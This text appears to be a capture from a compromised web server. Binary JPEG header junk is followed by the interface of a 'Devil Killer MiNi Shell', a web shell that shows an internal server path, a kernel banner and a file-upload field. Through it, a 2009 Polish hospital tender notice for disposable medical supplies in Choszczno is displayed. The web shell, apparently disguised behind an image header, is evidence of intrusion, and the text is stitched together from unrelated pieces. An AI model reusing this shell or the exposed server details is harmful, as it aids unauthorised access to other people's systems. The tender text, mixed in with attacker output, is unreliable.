JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/126682-N-2009.html

<p class="kh_header"><b>Choszczno: DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU
DLA
 SP ZOZ W CHOSZCZNIE</b><br>
<b>Numer ogłoszenia: 126682 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Niedziałkowskiego 4a, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7652438, 7657211 w 143, faks 095 7652410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozchoszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU
DLA
 SP ZOZ W CHOSZCZNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa materiałów medycznych i sprzętu medycznego jednorazowego użytku dla SP ZOZ w Choszcznie wyszczególnione w załączniku nr 2 do SIWZ podzielonym na 8 pakietów. Szczegóły patrz załącznik nr 2 do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione w niniejszej specyfikacji istotnych warunków zamówienia zadania, z których każde stanowi odrębną część przedmiotu zamówienia zwanego pakietem oznaczonym w załączniku nr 2 do SIWZ liczbami rzymskimi. Zadaniem jest pakiet. Pakietów jest 8. Opis pakietów zawiera załącznik nr 2 do SIWZ - formularz asortymentowo cenowy. Ofertę można składać na wszystkie pakiety  i równie dobrze na jeden pakiet. Każdy pakiet oceniany i rozpatrywany jest oddzielnie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.10.00-5, 33.77.00.00-8, 33.19.90.00-1, 39.51.82.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie poniższych warunków:
.	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień ( np. koncesje, zezwolenia i licencje);
.	Posiadający niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
.	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;  nie podlegający wykluczeniu z postępowania o udzielenie zamówienia;
.	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

2.	Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w pkt. 1.,
.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych, 
.	Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
.	Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
.	Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust.3.
.	Nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

3.	Zamawiający odrzuca ofertę wykonawcy:

.	Jeżeli jest niezgodna z ustawą; 
.	Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust 2 pkt 3, 
.	Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
.	Zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
.	Wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub nie zaproszonego do składania ofert, 
.	Zawierającą błędy w obliczeniu ceny. 
.	Który w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt 3;
.	Nieważnej na podstawie odrębnych przepisów.

4.	Ocena spełniania w.w warunków  dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż warunki w.w zostały przez Wykonawcę spełnione. Nie spełnienie chociaż jednego z w/w warunków wyklucza Wykonawcę z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a ofertę składają się następujące dokumenty i załączniki:
.	Formularz ofertowy (zał. nr 1 do SIWZ;)
.	Formularz asortymentowo-cenowy (zał. nr 2 do SIWZ);
.	Oświadczenie oferenta potwierdzające spełnianie wymagań określonych w art. 22 ust.1 ustawy PzP, oraz o nie podleganiu wykluczeniu na podstawie art. 24  ( zał. nr 3 do SIWZ).
.	Zatwierdzony projekt umowy (załącznik nr 4 do SIWZ)
.	Oświadczenie o atestach stanowiące załącznik nr 5 do SIWZ.

2.  W celu potwierdzenia, że wykonawca posiada uprawnienie do   wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:
1) koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji,
zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem;
2) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;


3.  W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
1) stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, zamiast dokumentów, o których mowa w ust.2 pkt. 1
Ust. 1 pkt 2, 3 i 5 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne
albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
ust. 1 pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju
pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
2. Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.

 5.  Dokumenty wymagane w przypadku składania oferty wspólnej: 

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarciu umowy.



Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI    dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.   

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.spzozchoszczno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej. 
73-200 Choszczno 
ulica Niedziałkowskiego 4A 
Pokój nr 306.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej. 
73-200 Choszczno 
ulica Niedziałkowskiego 4A 
Pokój nr 305 (sekretariat Dyrektora)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> klipsy, dreny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klips polimerowy niewchłanialny zamykający naczynie, od 3-10 mm	3-10 mm	200
Klips polimerowy niewchłanialny zamykający naczynie, od 7-16 mm	7-16 mm	240
Klips tytanowy średnioduzy, kształt podkowiasty		60
Dreny do zestawów drenażowych szklanych dwubutlowych 100 x 50, ilość 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> papiery, rękawy papierowo-foliowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier krepowany  zielony  lub biały 120 x 120 cm	125 ark	15	1875
Papier krepowany  zielony     75 x 75 cm    	250 ark	4	1000
Papier krepowany biały         75 x 75 cm	250 ark	4	1000
Testy paskowe  chem. formalinowe 150x30 mm	250	10	2400
Testy paskowe  chem. parowe do sterylizacji we wszystkich cyklach - wieloparametrowe. Wynik prawidłowy wskaźnik zmienia się z koloru kremowego na czarny 	240/480 ark	25	12000
Rękawy  papierowo - foliowe      5 cm x 200 m    płaskie	rolki	3	3
Rekaw   papierowo - foliowe     10 cm x 200 m   płaskie	rolki	30	30
Rekaw   papierowo - foliowe     15 cm x 200 m   płaskie	rolki	40	40
Rekaw   papierowo - foliowe     20 cm x 200 m   płaskie	rolki	25	25
Rekaw   papierowo - foliowe     25 cm x 200 m   płaskie	rolki	15	15
Rekaw   papierowo - foliowe     30 cm x 200 m   płaskie	rolki	20	20
Rękawy  papierowo - foliowe 15 x 5  x 100 m  z fałdą	rolki	5	5
Rękawy  papierowo - foliowe 20 x 55 x 100 m   z fałdą	rolki	10	10
Rękawy  papierowo - foliowe 40 x 8 x 100 m   z fałdą	rolki	10	10
Test   BOWIE - DICK  z arkuszem wczesnego ostrzegania	op/a 20 szt/	1	20
Torba  foliowo  -  włókninowa  480 mm   x  640 mm	op. 100 sztuk 	10	1000
Torba  foliowo  -  włókninowa  480 mm  x  750 mm	op. 100 sztuk 	10	1000
Taśma samoprzylepna do steryl.parą  wodną ze  wskaznikiem    19 mm x 50 m 	rolki	25	25
Wskaźnik biologiczny o szybkim odczycie para wodna
odczyt po 3 godz.	op. 50	1	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> fartuchy, podkłady,prześcieradła.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch z flizeliny j. u. duży ochronny zielony	szt	2000
Podkład z flizeliny j. u. jednostronnie folia 210x75	szt	10000
Koszula z flizeliny (Gruba) zabiegowa wiązana na troki z tyłu, krótki rękaw	szt	1000
Prześcieradło zielone z flizeliny j. u. 210x150	szt	2000
Serweta zielona z flizeliny j. u. 70x70	szt	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 39.51.82.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> czepki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek okrągły chirurgiczny wykonany z przewiewnej włókniny, ściągnięty lekką gumką pakowany w kartoniki 	SZT	2500
Czepek chirurgiczny męski, z włókniny pochłaniającej pot wiązany z tyłu  na troki, typu furażerka z przewiewnym denkiem z przewiewnej włókniny  perforowanej , niejałowy , pakowany w kartonikach rozmiar XL	SZT	2500
Czepek chirurgiczny damski z włókniny pochłaniającej pot, z przewiewnym denkiem z włókniny perforowanej, podwyższony, ściągany gumką z tyłu, pakowany w  kartonikach	SZT	3000
Pokrowiec na buty chirurgiczny, z mocnej włókniny, odporny na przetarcie	SZT	2500
Podkład włókninowy higieniczny o wym mnin 210 x 160 cm	SZT	7500
Ekonomiczny podkład higieniczny o wymiarach 75 x 100cm, wykonany z mocnego laminatu nieprzemakalnego.	SZT	7500
Sterylny pokrowiec na na aparaturę, o średnicy 50cm wykonany z folii PE, ściągnięty wyjątkowo elastyczną gumką umożliwiającą łatwe nałożenie na przyrząd	SZT	150
Sterylny pokrowiec na na aparaturę, o średnicy 80cm wykonany z folii PE, ściągnięty wyjątkowo elastyczną gumką umożliwiającą łatwe nałożenie na przyrząd	SZT	150
Pokrowiec sterylny foliowy dł.  2m- 2,5m i szer. 13 - 16 cm  na przewody teleskopowo złożony  z taśmami  do mocowania na końcówkach odpornymi na rozmiękanie	SZT	150
Czepek chirurgiczny typu furażerka, boki wykonane z dwóch warstw chłonnej włókniny. Pakowany w kartonik. Kolor niebieski lub zielony	SZT	1500
czepek chirurgiczny w kształcie beretu. Pakowany w kartonik, kolor zielony.	SZT	1500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pieluchy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieluchomajtki rozmiar L	szt.	10000
Pieluchomajtki dla dzieci waga 3 - 6 kg	szt.	200
Pieluchomajtki dla dzieci waga 4 - 9 kg	szt.	300
Pieluchomajtki dla noworodków waga 2-5 kg	szt.	100
Bardzo chłonne podkłady z rozdrobnionej celulozy z jedną warstwą nieprzemakalną o wym. 60x90 cm	szt.	60000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> serwety operacyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestw serwet operacyjnych, barierowych, wykonanych z chłonnego i nieprzemekalnego laminatu dwu lub trójwarstwowego z włókniny wiskozowej bez dodatku celulozy, o gram. min. 70 g/m2; warstwa barierowa z polietylenu; odporność na penetrację płynów min. 150cm o składzie minimalnym:                                                                                                                      a) serweta na ekran anestezjologiczny o wym. min. 150x200 cm z taśmą samoprzylepną - 1 szt.                                                                            b) serweta dolna o wym. min. 170x175 cm z taśmą samoprzylepną - 1 szt.                                                                                                                           c) serwety boczne o wymiarach min. 75x90 cm wykończone taśmą lepną na całej długości dłuższego boku - 2 szt.                                                           d) serweta do nakrycia stolika Mayo, z zewnętrzną warstwą chłonną o wym. min. 80x145 cm - 1 szt.                                                                            e) serweta do nakrycia stołu instrumentariuszki o wym. 140x190 cm                                                                       f) ściereczki do rąk min. 2 szt.                                                                        	SZT	700
Zestaw serwet operacyjnych do zabiegów w chirurgii biodra, barierowych, wykonanych z chłonnego i nieprzemekalnego laminatu dwu lub trójwarstwowego z włókniny wiskozowej bez dodatku celulozy, o gram. min. 70 g/m2; warstwa barierowa z polietylenu; odporność na penetracje płynów min. 150 cm o składzie minimalnym: a) serweta na stolik instrumentariuszki - 1 szt. 140x190 cm  b) serweta na stolik Mayo 80x145 cm   c) serweta nieprzylepna 75x90 cm   d) serweta na biodro 150x200   e) osłona na kończyne 35x120 cm   f) serweta samoprzylepna górna 170x300   g) serweta z wycięciem U 200x260 cm, wycięcie 6,5x95 cm              h) 2 taśmy samoprzylepne 10x50 cm	SZT	50
Zestaw serwet operacyjnych do zabiegów artroskopowych, barierowych, wykonanych z chłonnego i nieprzemekalnego laminatu dwu lub trójwarstwowego z włókniny wiskozowej bez dodatku celulozy, o gram. min. 53 g/m2; warstwa barierowa z polietylenu; odporność na penetrację płynów min. 150cm o składzie minimalnym: a) serweta na stolik instrumentariuszki - 1 szt. 140x190 cm  b) serweta na stolik Mayo 80x145 cm   c) serweta nieprzylepna 150x175 cm   d)  osłona na kończyne 25x80 cm e) serweta do obłożenia kończyny z elastycznym samouszczelniającym się otworem oraz uchwytem velcro do mocowania kabli i drenów 200x320 cm   f) 2 taśmy samoprzylepne 10x50 cm	SZT	150
Sterylny pełnoochronny fartuch chirurgiczny, wykonany z włókniny typu SMMS,  szwy ultradźwiękowe,nieprzemakalne wstawki w przedniej części i w rękawach chronią operatora przed przenikaniem płynów, u góry zapinany na rzep, rękawy wykończone elastycznym, bawełnianym mankietem, troki łączone kartonikiem, sposób złożenia i konstrukcja pozwala na aplikację fartucha zapewniającą zachowanie sterylności zarówno z przodu jak i z tyłu operatora, kolor niebieski lub zielony, rozmiar L-XL	SZT	150
Sterylny pełnoochronny fartuch chirurgiczny, wykonany z włókniny typu SMMS, u góry zapinany na rzep, rękawy wykończone elastycznym, bawełnianym mankietem, troki łączone kartonikiem, sposób złożenia i konstrukcja pozwala na aplikację fartucha zapewniającą zachowanie sterylności zarówno z przodu jak i z tyłu operatora, kolor niebieski lub zielony, rozmiar L-XL	SZT	100
Serweta operacyjna,  włókninowa , do pokrycia stołu operacyjnego, o wym min. 150x200 cm	SZT	100
Zestaw serwet operacyjnych, barierowych, wykonanych z chłonnego i nieprzemekalnego laminatu dwu lub trójwarstwowego do cięcia cesarskiego, o składzie min. a) 1 serweta do nakrycia stołu instrumentariuszki 150x200 cm  b) 1 serweta na stolik Mayo 80x145 cm   c) 1 serweta do cięcia cesarskiego z torbą na płyny oraz oknem wypełnionym folią chirurgiczną 250x200x315 cm d) 1 chłonna serweta dla noworodka  87x90 cm  e)  1 taśma samoprzylepna 10x50 cm f) 2 ręczniki celulozowe 33x33 cm	SZT	50
serweta do zabiegów na kończynie, operacyjna, barierowa, wykonana z chłonnego i niep[rzemakalnego laminatu o gramaturze min. 60 g/m2 200x320 cm, z samouszczelniającym się otworem O 5x7 cm	SZT	50
Serweta pełnobarierowa, operacyjna 50x60 cm z otworem O 7 cm, samoprzylepna	SZT	100
Serweta z otworem operacyjna, samoprzylepna, dwuczęściowa z możliwością regulacji średnicy otworu 45x75 cm	SZT	50
Serweta z otworem operacyjna, samoprzylepna, dwuczęściowa z możliwością regulacji średnicy otworu 75x90 cm	SZT	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ubrania chirurgiczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna dwu lub trójwarstwowa pełnobarierowa zawiązywana na troki, wykonana z wysokiej jakości włóknin nie powodujących podrażnień skóry, sposób pakowania w kartoniki gwarantujący higieniczne przechowywanie i wyjmowanie.	SZT	500
Maska chirurgiczna dwu lub trójwarstwowa pełnobarierowa z gumkami na uszy, wykonana z wysokiej jakości włóknin nie powodujących podrażnień skóry, sposób pakowania w kartoniki gwarantujący higieniczne przechowywanie i wyjmowanie.	SZT	500
